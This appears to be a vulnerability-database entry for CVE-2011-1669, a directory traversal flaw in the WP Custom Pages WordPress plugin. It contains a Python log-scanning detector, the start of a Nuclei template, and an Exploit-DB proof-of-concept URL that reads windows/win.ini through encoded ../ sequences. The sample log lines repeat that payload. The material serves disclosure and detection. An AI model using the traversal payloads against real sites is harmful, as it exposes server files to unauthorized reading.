CVE-2011-1669
Published 2011-04-10
Priority P3 · 44 · medium · 5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS 22.16% (97.4th percentile)
Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
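A log-review check for the pattern described above, as an added example that is not part of the advisory or the plugin: it flags access-log requests to wp-download.php whose url parameter contains a dot-dot path segment after percent-decoding. The combined log format, the repeated-decoding step and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The endpoint named in the CVE description.
ENDPOINT = re.compile(r"/wp-custom-pages/wp-download\.php$", re.IGNORECASE)
# A path segment that is exactly "..", bounded by / or \ or the string edges.
DOTDOT = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=5):
    """Percent-decode until stable so re-encoded input is also normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal_request(target):
    """True if the request target hits wp-download.php with '..' in url=."""
    parts = urlsplit(target)
    if not ENDPOINT.search(parts.path):
        return False
    # parse_qsl already decodes once; fully_decode handles any further layers.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() == "url" and DOTDOT.search(fully_decode(value)):
            return True
    return False


def scan(log_lines):
    """Return the log lines whose request matches the traversal pattern."""
    matches = ((line, REQUEST.search(line)) for line in log_lines)
    return [ln for ln, m in matches if m and is_traversal_request(m.group(1))]


# Constructed sample log lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Apr/2011:10:00:01 +0000] "GET /wordpress/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2fwindows%2fwin.ini HTTP/1.1" 200 512',
    '192.0.2.10 - - [05/Apr/2011:10:00:02 +0000] "GET /wordpress/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%252f..%252fwindows%252fwin.ini HTTP/1.1" 200 512',
    '192.0.2.11 - - [05/Apr/2011:10:00:03 +0000] "GET /wordpress/wp-content/plugins/wp-custom-pages/wp-download.php?url=report..2011.pdf HTTP/1.1" 200 9000',
    '192.0.2.12 - - [05/Apr/2011:10:00:04 +0000] "GET /wordpress/index.php?p=12 HTTP/1.1" 200 4000',
]

if __name__ == "__main__":
    print("\n".join(scan(SAMPLE_LOG)))
```

The DOTDOT pattern only matches a whole `..` segment, so a filename such as `report..2011.pdf` is not flagged.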
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mikoviny | wp_custom_pages | — | — |
No detection rules found.
Exploit-DB
WordPress Plugin Custom Pages 0.5.0.1 - Local File Inclusion
exploitdb·2011-04-05
---
Software................WordPress WP Custom Pages 0.5.0.1
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://wordpress.org/extend/plugins/wp-custom-pages/
Discovery Date..........4/3/2011
Tested On...............Windows Vista + XAMPP
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch
--PoC--
http://localhost/wordpress/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
Nuclei
WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)
nuclei·CVSS 5.0
A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
Template:

```yaml
id: CVE-2011-1669

info:
  name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
  impact: |
    An attacker can read arbitrary files on the server, potentially leading to unauthorized access to sensitive information.
  remediation: Upgrade to the latest versio
```
http://osvdb.org/71707
http://secunia.com/advisories/43963
http://www.autosectools.com/Advisories/WordPress.WP.Custom.Pages.0.5.0.1_Local.File.Inclusion_169.html
http://www.exploit-db.com/exploits/17119
http://www.securityfocus.com/bid/47146
https://exchange.xforce.ibmcloud.com/vulnerabilities/66559